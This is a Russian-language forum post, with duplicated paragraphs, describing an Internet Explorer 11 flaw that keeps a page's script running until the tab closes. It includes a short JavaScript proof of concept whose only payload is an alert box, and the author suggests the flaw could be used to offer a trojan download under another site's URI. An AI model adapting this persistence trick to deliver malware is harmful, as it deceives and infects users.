█ 01.03.2017 09:16
Осел, т.е. IE11 сейчас на втором месте по популярности браузеров, как мне где-то попадалась статистика.
И некий исследователь обнаружил, что созданный определенным образом скрипт будет работать, пока вкладка не будет закрыта.
как видим на примере, можно подкараулить подходящий URI и от его имени предложить скачать какой-нибудь троянец, например. Либо еще какую-то каку сотворить. Создатели осла не унимаются... Сколько раз твердили миру не пользоваться IE...
Вот, этой дырки. Работает.
И некий исследователь обнаружил, что созданный определенным образом скрипт будет работать, пока вкладка не будет закрыта.
Код:
doc = new ActiveXObject("htmlFile");
// Alert every 5 seconds
doc.Script.setInterval("alert('Hello, world!')", 5000);
// Save a self-reference
doc.Script.doc = doc;
// Use the open method. Nothing changes here, but now IE will not
// destroy the previous reference and the script will continue running.
window.open("","_self"); // "Does nothing", but this line is crucial. 
как видим на примере, можно подкараулить подходящий URI и от его имени предложить скачать какой-нибудь троянец, например. Либо еще какую-то каку сотворить. Создатели осла не унимаются... Сколько раз твердили миру не пользоваться IE...
Вот, этой дырки. Работает.
Часовой пояс GMT +3, время: 08:55.
Форум на базе vBulletin®
Copyright © Jelsoft Enterprises Ltd.
В случае заимствования информации гипертекстовая индексируемая ссылка на Форум обязательна.
Copyright © Jelsoft Enterprises Ltd.
В случае заимствования информации гипертекстовая индексируемая ссылка на Форум обязательна.